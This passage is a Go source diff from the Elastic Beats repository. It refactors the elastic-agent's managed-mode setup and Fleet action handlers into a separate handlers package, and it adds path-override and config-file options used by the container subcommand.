@@ func newManaged( return nil, errors.New(err, "failed to initialize monitoring") } - router, err := newRouter(log, streamFactory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) + router, err := router.New(log, stream.Factory(managedApplication.bgContext, agentInfo, cfg.Settings, managedApplication.srv, combinedReporter, monitor, statusCtrl)) if err != nil { return nil, errors.New(err, "fail to initialize pipeline router") } @@ -131,15 +138,15 @@ func newManaged( return nil, errors.New(err, "failed to initialize composable controller") } - emit, err := emitter( + emit, err := emitter.New( managedApplication.bgContext, log, agentInfo, composableCtrl, router, - &configModifiers{ - Decorators: []decoratorFunc{injectMonitoring}, - Filters: []filterFunc{filters.StreamChecker, injectFleet(rawConfig, sysInfo.Info(), agentInfo)}, + &pipeline.ConfigModifiers{ + Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}, + Filters: []pipeline.FilterFunc{filters.StreamChecker, modifiers.InjectFleet(rawConfig, sysInfo.Info(), agentInfo)}, }, caps, monitor, @@ -147,12 +154,12 @@ func newManaged( if err != nil { return nil, err } - acker, err := newActionAcker(log, agentInfo, client) + acker, err := fleet.NewAcker(log, agentInfo, client) if err != nil { return nil, err } - batchedAcker := newLazyAcker(acker, log) + batchedAcker := lazy.NewAcker(acker, log) // Create the state store that will persist the last good policy change on disk. stateStore, err := store.NewStateStoreWithMigration(log, paths.AgentActionStoreFile(), paths.AgentStateStoreFile()) @@ -162,7 +169,7 @@ func newManaged( managedApplication.stateStore = stateStore actionAcker := store.NewStateStoreActionAcker(batchedAcker, stateStore) - actionDispatcher, err := newActionDispatcher(managedApplication.bgContext, log, &handlerDefault{log: log}) + actionDispatcher, err := dispatcher.New(managedApplication.bgContext, log, handlers.NewDefault(log)) if err != nil { return nil, err } @@ -177,60 +184,57 @@ func newManaged( combinedReporter, caps) - policyChanger := &handlerPolicyChange{ - log: log, - emitter: emit, - agentInfo: agentInfo, - config: cfg, - store: storeSaver, - } - if cfg.Fleet.Server == nil { - // setters only set when not running a local Fleet Server - policyChanger.setters = []clientSetter{acker} - } + policyChanger := handlers.NewPolicyChange( + log, + emit, + agentInfo, + cfg, + storeSaver, + ) + actionDispatcher.MustRegister( &fleetapi.ActionPolicyChange{}, policyChanger, ) + actionDispatcher.MustRegister( + &fleetapi.ActionPolicyReassign{}, + handlers.NewPolicyReassign(log), + ) + actionDispatcher.MustRegister( &fleetapi.ActionUnenroll{}, - &handlerUnenroll{ - log: log, - emitter: emit, - dispatcher: router, - closers: []context.CancelFunc{managedApplication.cancelCtxFn}, - stateStore: stateStore, - }, + handlers.NewUnenroll( + log, + emit, + router, + []context.CancelFunc{managedApplication.cancelCtxFn}, + stateStore, + ), ) actionDispatcher.MustRegister( &fleetapi.ActionUpgrade{}, - &handlerUpgrade{ - upgrader: managedApplication.upgrader, - log: log, - }, + handlers.NewUpgrade(log, managedApplication.upgrader), ) actionDispatcher.MustRegister( &fleetapi.ActionSettings{}, - &handlerSettings{ - log: log, - reexec: reexec, - agentInfo: agentInfo, - }, + handlers.NewSettings( + log, + reexec, + agentInfo, + ), ) actionDispatcher.MustRegister( &fleetapi.ActionApp{}, - &handlerAppAction{ - log: log, - }, + handlers.NewAppAction(log, managedApplication.srv), ) actionDispatcher.MustRegister( &fleetapi.ActionUnknown{}, - &handlerUnknown{log: log}, + handlers.NewUnknown(log), ) actions := stateStore.Actions() @@ -244,7 +248,7 @@ func newManaged( } } - gateway, err := newFleetGateway( + gateway, err := fleetgateway.New( managedApplication.bgContext, log, agentInfo, @@ -258,13 +262,17 @@ func newManaged( if err != nil { return nil, err } - gateway, err = wrapLocalFleetServer(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) + gateway, err = localgateway.New(managedApplication.bgContext, log, cfg.Fleet, rawConfig, gateway, emit) if err != nil { return nil, err } - // add the gateway to setters, so the gateway can be updated - // when the hosts for Kibana are updated by the policy. - policyChanger.setters = append(policyChanger.setters, gateway) + // add the acker and gateway to setters, so the they can be updated + // when the hosts for Fleet Server are updated by the policy. + if cfg.Fleet.Server == nil { + // setters only set when not running a local Fleet Server + policyChanger.AddSetter(gateway) + policyChanger.AddSetter(acker) + } managedApplication.gateway = gateway return managedApplication, nil diff --git a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go index 890183e9033..177ab7cabf3 100644 --- a/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/managed_mode_test.go @@ -10,11 +10,18 @@ import ( "testing" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/dispatcher" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/emitter/modifiers" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/router" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" @@ -23,8 +30,8 @@ import ( ) func TestManagedModeRouting(t *testing.T) { - streams := make(map[routingKey]stream) - streamFn := func(l *logger.Logger, r routingKey) (stream, error) { + streams := make(map[pipeline.RoutingKey]pipeline.Stream) + streamFn := func(l *logger.Logger, r pipeline.RoutingKey) (pipeline.Stream, error) { m := newMockStreamStore() streams[r] = m @@ -34,33 +41,33 @@ func TestManagedModeRouting(t *testing.T) { ctx, cancel := context.WithCancel(context.Background()) defer cancel() - log, _ := logger.New("") - router, _ := newRouter(log, streamFn) + log, _ := logger.New("", false) + router, _ := router.New(log, streamFn) agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} composableCtrl, _ := composable.New(log, nil) - emit, err := emitter(ctx, log, agentInfo, composableCtrl, router, &configModifiers{Decorators: []decoratorFunc{injectMonitoring}}, nil) + emit, err := emitter.New(ctx, log, agentInfo, composableCtrl, router, &pipeline.ConfigModifiers{Decorators: []pipeline.DecoratorFunc{modifiers.InjectMonitoring}}, nil) require.NoError(t, err) - actionDispatcher, err := newActionDispatcher(ctx, log, &handlerDefault{log: log}) + actionDispatcher, err := dispatcher.New(ctx, log, handlers.NewDefault(log)) require.NoError(t, err) cfg := configuration.DefaultConfiguration() actionDispatcher.MustRegister( &fleetapi.ActionPolicyChange{}, - &handlerPolicyChange{ - log: log, - emitter: emit, - agentInfo: agentInfo, - config: cfg, - store: nullStore, - }, + handlers.NewPolicyChange( + log, + emit, + agentInfo, + cfg, + nullStore, + ), ) actions, err := testActions() require.NoError(t, err) - err = actionDispatcher.Dispatch(newNoopAcker(), actions...) + err = actionDispatcher.Dispatch(noopacker.NewAcker(), actions...) require.NoError(t, err) // has 1 config request for fb, mb and monitoring? @@ -72,10 +79,10 @@ func TestManagedModeRouting(t *testing.T) { confReq := defaultStreamStore.(*mockStreamStore).store[0] assert.Equal(t, 3, len(confReq.ProgramNames())) - assert.Equal(t, monitoringName, confReq.ProgramNames()[2]) + assert.Equal(t, modifiers.MonitoringName, confReq.ProgramNames()[2]) } -func testActions() ([]action, error) { +func testActions() ([]fleetapi.Action, error) { checkinResponse := &fleetapi.CheckinResponse{} if err := json.Unmarshal([]byte(fleetResponse), &checkinResponse); err != nil { return nil, err diff --git a/x-pack/elastic-agent/pkg/agent/application/once.go b/x-pack/elastic-agent/pkg/agent/application/once.go index e4cb1d6dd90..39d53512a24 100644 --- a/x-pack/elastic-agent/pkg/agent/application/once.go +++ b/x-pack/elastic-agent/pkg/agent/application/once.go @@ -5,17 +5,19 @@ package application import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) type once struct { log *logger.Logger discover discoverFunc - emitter emitterFunc + emitter pipeline.EmitterFunc } -func newOnce(log *logger.Logger, discover discoverFunc, emitter emitterFunc) *once { +func newOnce(log *logger.Logger, discover discoverFunc, emitter pipeline.EmitterFunc) *once { return &once{log: log, discover: discover, emitter: emitter} } @@ -35,3 +37,12 @@ func (o *once) Start() error { func (o *once) Stop() error { return nil } + +func readfiles(files []string, emitter pipeline.EmitterFunc) error { + c, err := config.LoadFiles(files...) + if err != nil { + return errors.New(err, "could not load or merge configuration", errors.TypeConfig) + } + + return emitter(c) +} diff --git a/x-pack/elastic-agent/pkg/agent/application/paths/common.go b/x-pack/elastic-agent/pkg/agent/application/paths/common.go index fca3dbd8828..d5d56d5d000 100644 --- a/x-pack/elastic-agent/pkg/agent/application/paths/common.go +++ b/x-pack/elastic-agent/pkg/agent/application/paths/common.go @@ -16,24 +16,33 @@ import ( ) const ( - tempSubdir = "tmp" + // DefaultConfigName is the default name of the configuration file. + DefaultConfigName = "elastic-agent.yml" + // AgentLockFileName is the name of the overall Elastic Agent file lock. + AgentLockFileName = "agent.lock" + tempSubdir = "tmp" ) var ( - topPath string - configPath string - logsPath string - tmpCreator sync.Once + topPath string + configPath string + configFilePath string + logsPath string + unversionedHome bool + tmpCreator sync.Once ) func init() { topPath = initialTop() configPath = topPath logsPath = topPath + unversionedHome = false // only versioned by container subcommand fs := flag.CommandLine fs.StringVar(&topPath, "path.home", topPath, "Agent root path") + fs.BoolVar(&unversionedHome, "path.home.unversioned", unversionedHome, "Agent root path is not versioned based on build") fs.StringVar(&configPath, "path.config", configPath, "Config path is the directory Agent looks for its config file") + fs.StringVar(&configFilePath, "c", DefaultConfigName, "Configuration file, relative to path.config") fs.StringVar(&logsPath, "path.logs", logsPath, "Logs path contains Agent log output") } @@ -43,6 +52,14 @@ func Top() string { return topPath } +// SetTop overrides the Top path. +// +// Used by the container subcommand to adjust the overall top path allowing state can be maintained between container +// restarts. +func SetTop(path string) { + topPath = path +} + // TempDir returns agent temp dir located within data dir. func TempDir() string { tmpDir := filepath.Join(Data(), tempSubdir) @@ -55,16 +72,55 @@ func TempDir() string { // Home returns a directory where binary lives func Home() string { + if unversionedHome { + return topPath + } return versionedHome(topPath) } +// IsVersionHome returns true if the Home path is versioned based on build. +func IsVersionHome() bool { + return !unversionedHome +} + +// SetVersionHome sets if the Home path is versioned based on build. +// +// Used by the container subcommand to adjust the home path allowing state can be maintained between container +// restarts. +func SetVersionHome(version bool) { + unversionedHome = !version +} + // Config returns a directory where configuration file lives func Config() string { return configPath } +// SetConfig overrides the Config path. +// +// Used by the container subcommand to adjust the overall config path allowing state can be maintained between container +// restarts. +func SetConfig(path string) { + configPath = path +} + +// ConfigFile returns the path to the configuration file. +func ConfigFile() string { + if configFilePath == "" || configFilePath == DefaultConfigName { + return filepath.Join(Config(), DefaultConfigName) + } + if filepath.IsAbs(configFilePath) { + return configFilePath + } + return filepath.Join(Config(), configFilePath) +} + // Data returns the data directory for Agent func Data() string { + if unversionedHome { + // unversioned means the topPath is the data path + return topPath + } return filepath.Join(Top(), "data") } @@ -73,6 +129,11 @@ func Logs() string { return logsPath } +// SetLogs updates the path for the logs. +func SetLogs(path string) { + logsPath = path +} + // initialTop returns the initial top-level path for the binary // // When nested in top-level/data/elastic-agent-${hash}/ the result is top-level/. diff --git a/x-pack/elastic-agent/pkg/agent/application/periodic.go b/x-pack/elastic-agent/pkg/agent/application/periodic.go index 9e13251f4f1..d21d8bb4cbd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/periodic.go +++ b/x-pack/elastic-agent/pkg/agent/application/periodic.go @@ -8,6 +8,7 @@ import ( "strings" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/filewatcher" @@ -18,7 +19,7 @@ type periodic struct { period time.Duration done chan struct{} watcher *filewatcher.Watch - emitter emitterFunc + emitter pipeline.EmitterFunc discover discoverFunc } @@ -108,7 +109,7 @@ func newPeriodic( log *logger.Logger, period time.Duration, discover discoverFunc, - emitter emitterFunc, + emitter pipeline.EmitterFunc, ) *periodic { w, err := filewatcher.New(log, filewatcher.DefaultComparer) diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go new file mode 100644 index 00000000000..293530b5edd --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/action.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package actions + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" +) + +// Handler handles action coming from fleet. +type Handler interface { + Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error +} + +// ClientSetter sets the client for communication. +type ClientSetter interface { + SetClient(client.Sender) +} diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go new file mode 100644 index 00000000000..a8e7b883258 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_application.go @@ -0,0 +1,82 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + "fmt" + "time" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/server" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +const defaultActionTimeout = time.Minute + +// AppAction is a handler for application actions. +type AppAction struct { + log *logger.Logger + srv *server.Server +} + +// NewAppAction creates a new AppAction handler. +func NewAppAction(log *logger.Logger, srv *server.Server) *AppAction { + return &AppAction{ + log: log, + srv: srv, + } +} + +// Handle handles application action. +func (h *AppAction) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Debugf("handlerAppAction: action '%+v' received", a) + action, ok := a.(*fleetapi.ActionApp) + if !ok { + return fmt.Errorf("invalid type, expected ActionApp and received %T", a) + } + + appState, ok := h.srv.FindByInputType(action.InputType) + if !ok { + return fmt.Errorf("matching app is not found for action input: %s", action.InputType) + } + + params, err := action.MarshalMap() + if err != nil { + return err + } + + start := time.Now().UTC() + res, err := appState.PerformAction(action.InputType, params, defaultActionTimeout) + end := time.Now().UTC() + + startFormatted := start.Format(time.RFC3339Nano) + endFormatted := end.Format(time.RFC3339Nano) + if err != nil { + action.StartedAt = startFormatted + action.CompletedAt = endFormatted + action.Error = err.Error() + } else { + action.StartedAt = readMapString(res, "started_at", startFormatted) + action.CompletedAt = readMapString(res, "completed_at", endFormatted) + action.Error = readMapString(res, "error", "") + } + + return acker.Ack(ctx, action) +} + +func readMapString(m map[string]interface{}, key string, def string) string { + if m == nil { + return def + } + + if v, ok := m[key]; ok { + if s, ok := v.(string); ok && s != "" { + return s + } + } + return def +} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go similarity index 74% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go index 76bdf4c0cac..71347407768 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "bytes" @@ -13,6 +13,10 @@ import ( "time" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline/actions" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/client" "gopkg.in/yaml.v2" @@ -29,20 +33,46 @@ const ( apiStatusTimeout = 15 * time.Second ) -type clientSetter interface { - SetClient(clienter) -} - -type handlerPolicyChange struct { +// PolicyChange is a handler for POLICY_CHANGE action. +type PolicyChange struct { log *logger.Logger - emitter emitterFunc + emitter pipeline.EmitterFunc agentInfo *info.AgentInfo config *configuration.Configuration store storage.Store - setters []clientSetter + setters []actions.ClientSetter +} + +// NewPolicyChange creates a new PolicyChange handler. +func NewPolicyChange( + log *logger.Logger, + emitter pipeline.EmitterFunc, + agentInfo *info.AgentInfo, + config *configuration.Configuration, + store storage.Store, + setters ...actions.ClientSetter, +) *PolicyChange { + return &PolicyChange{ + log: log, + emitter: emitter, + agentInfo: agentInfo, + config: config, + store: store, + setters: setters, + } +} + +// AddSetter adds a setter into a collection of client setters. +func (h *PolicyChange) AddSetter(cs actions.ClientSetter) { + if h.setters == nil { + h.setters = make([]actions.ClientSetter, 0) + } + + h.setters = append(h.setters, cs) } -func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetAcker) error { +// Handle handles policy change action. +func (h *PolicyChange) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerPolicyChange: action '%+v' received", a) action, ok := a.(*fleetapi.ActionPolicyChange) if !ok { @@ -66,7 +96,7 @@ func (h *handlerPolicyChange) Handle(ctx context.Context, a action, acker fleetA return acker.Ack(ctx, action) } -func (h *handlerPolicyChange) handleKibanaHosts(ctx context.Context, c *config.Config) (err error) { +func (h *PolicyChange) handleKibanaHosts(ctx context.Context, c *config.Config) (err error) { // do not update kibana host from policy; no setters provided with local Fleet Server if len(h.setters) == 0 { return nil @@ -98,7 +128,7 @@ func (h *handlerPolicyChange) handleKibanaHosts(ctx context.Context, c *config.C } }() - client, err := fleetapi.NewAuthWithConfig(h.log, h.config.Fleet.AccessAPIKey, h.config.Fleet.Kibana) + client, err := client.NewAuthWithConfig(h.log, h.config.Fleet.AccessAPIKey, h.config.Fleet.Kibana) if err != nil { return errors.New( err, "fail to create API client with updated hosts", diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go similarity index 93% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go index c30f886b0d1..1ab7ee20fdd 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_policy_change_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_change_test.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" @@ -20,6 +20,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" + noopacker "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi/acker/noop" ) type mockEmitter struct { @@ -33,8 +34,8 @@ func (m *mockEmitter) Emitter(policy *config.Config) error { } func TestPolicyChange(t *testing.T) { - log, _ := logger.New("") - ack := newNoopAcker() + log, _ := logger.New("", false) + ack := noopacker.NewAcker() agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} @@ -49,7 +50,7 @@ func TestPolicyChange(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -74,7 +75,7 @@ func TestPolicyChange(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -88,7 +89,7 @@ func TestPolicyChange(t *testing.T) { } func TestPolicyAcked(t *testing.T) { - log, _ := logger.New("") + log, _ := logger.New("", false) agentInfo, _ := info.NewAgentInfo() nullStore := &storage.NullStore{} @@ -107,7 +108,7 @@ func TestPolicyAcked(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, @@ -136,7 +137,7 @@ func TestPolicyAcked(t *testing.T) { } cfg := configuration.DefaultConfiguration() - handler := &handlerPolicyChange{ + handler := &PolicyChange{ log: log, emitter: emitter.Emitter, agentInfo: agentInfo, diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go new file mode 100644 index 00000000000..2a53ac0ae2b --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_policy_reassign.go @@ -0,0 +1,38 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package handlers + +import ( + "context" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" +) + +// PolicyReassign handles policy reassign change coming from fleet. +type PolicyReassign struct { + log *logger.Logger +} + +// NewPolicyReassign creates a new PolicyReassign handler. +func NewPolicyReassign(log *logger.Logger) *PolicyReassign { + return &PolicyReassign{ + log: log, + } +} + +// Handle handles POLICY_REASSIGN action. +func (h *PolicyReassign) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { + h.log.Debugf("handlerPolicyReassign: action '%+v' received", a) + + if err := acker.Ack(ctx, a); err != nil { + h.log.Errorf("failed to acknowledge POLICY_REASSIGN action with id '%s'", a.ID) + } else if err := acker.Commit(ctx); err != nil { + h.log.Errorf("failed to commit acker after acknowledging action with id '%s'", a.ID) + } + + return nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go similarity index 72% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go index bb0e2def363..17b0b8ac4a0 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_settings.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_settings.go @@ -2,7 +2,7 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" @@ -10,19 +10,37 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -// handlerSettings handles settings change coming from fleet and updates log level. -type handlerSettings struct { +type reexecManager interface { + ReExec(argOverrides ...string) +} + +// Settings handles settings change coming from fleet and updates log level. +type Settings struct { log *logger.Logger reexec reexecManager agentInfo *info.AgentInfo } +// NewSettings creates a new Settings handler. +func NewSettings( + log *logger.Logger, + reexec reexecManager, + agentInfo *info.AgentInfo, +) *Settings { + return &Settings{ + log: log, + reexec: reexec, + agentInfo: agentInfo, + } +} + // Handle handles SETTINGS action. -func (h *handlerSettings) Handle(ctx context.Context, a action, acker fleetAcker) error { +func (h *Settings) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerUpgrade: action '%+v' received", a) action, ok := a.(*fleetapi.ActionSettings) if !ok { diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go similarity index 55% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go index a0cec2753ee..aeecf865b0f 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_unenroll.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_unenroll.go @@ -2,28 +2,56 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" "fmt" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) -// After running Unenroll agent is in idle state, non managed non standalone. +type stateStore interface { + Add(fleetapi.Action) + AckToken() string + SetAckToken(ackToken string) + Save() error + Actions() []fleetapi.Action +} + +// Unenroll results in running agent entering idle state, non managed non standalone. // For it to be operational again it needs to be either enrolled or reconfigured. -type handlerUnenroll struct { +type Unenroll struct { log *logger.Logger - emitter emitterFunc - dispatcher programsDispatcher + emitter pipeline.EmitterFunc + dispatcher pipeline.Router closers []context.CancelFunc stateStore stateStore } -func (h *handlerUnenroll) Handle(ctx context.Context, a action, acker fleetAcker) error { +// NewUnenroll creates a new Unenroll handler. +func NewUnenroll( + log *logger.Logger, + emitter pipeline.EmitterFunc, + dispatcher pipeline.Router, + closers []context.CancelFunc, + stateStore stateStore, +) *Unenroll { + return &Unenroll{ + log: log, + emitter: emitter, + dispatcher: dispatcher, + closers: closers, + stateStore: stateStore, + } +} + +// Handle handles UNENROLL action. +func (h *Unenroll) Handle(ctx context.Context, a fleetapi.Action, acker store.FleetAcker) error { h.log.Debugf("handlerUnenroll: action '%+v' received", a) action, ok := a.(*fleetapi.ActionUnenroll) if !ok { @@ -31,8 +59,8 @@ func (h *handlerUnenroll) Handle(ctx context.Context, a action, acker fleetAcker } // Providing empty map will close all pipelines - noPrograms := make(map[routingKey][]program.Program) - h.dispatcher.Dispatch(a.ID(), noPrograms) + noPrograms := make(map[pipeline.RoutingKey][]program.Program) + h.dispatcher.Route(a.ID(), noPrograms) if !action.IsDetected { // ACK only events comming from fleet diff --git a/x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go similarity index 72% rename from x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go index a4940cfe55b..b0e2b65ff3a 100644 --- a/x-pack/elastic-agent/pkg/agent/application/handler_action_upgrade.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/actions/handlers/handler_action_upgrade.go @@ -2,25 +2,36 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package handlers import ( "context" "fmt" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage/store" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/fleetapi" ) +// 